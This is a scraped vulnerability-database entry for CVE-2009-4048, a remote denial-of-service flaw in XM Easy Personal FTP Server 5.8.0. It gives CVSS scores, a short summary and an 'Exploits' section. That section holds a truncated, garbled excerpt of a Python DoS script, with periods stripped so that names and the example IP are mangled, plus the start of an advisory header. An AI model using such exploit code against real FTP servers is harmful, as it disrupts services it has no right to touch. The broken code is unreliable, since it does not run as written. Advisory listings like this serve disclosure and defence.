4
CVSSv2

CVE-2009-4048

Published: 23/11/2009 Updated: 10/10/2018
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
VMScore: 410
Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

Vulnerability Summary

Dxmsoft XM Easy Personal FTP Server 5.8.0 allows remote authenticated users to cause a denial of service (daemon outage) via an APPE command to one socket in conjunction with a DELE command to a second socket.

Vulnerable Product Search on Vulmon Subscribe to Product

dxmsoft xm easy personal ftp server 5.8.0

Exploits

#!/usr/bin/python import socket import sys def Usage(): print ("Usage: /explpy <serv_ip> <Username> <password>\n") print ("Example:/explpy 19216848183 anonymous anonymous\n") if len(sysargv) <> 4: Usage() sysexit(1) else: hostname=sysargv[1] username=sysargv[2] passwd=sysargv[3] test_string="a" sock = socketsoc ...
Date of Discovery: 24-Nov-2009 Credits:leinakesi[at]gmailcom Vendor: Dxmsoft ******************************************************************************* Affected: XM Easy Personal FTP Server 580 Earlier versions may also be affected ******************************************************************************* Overview: ...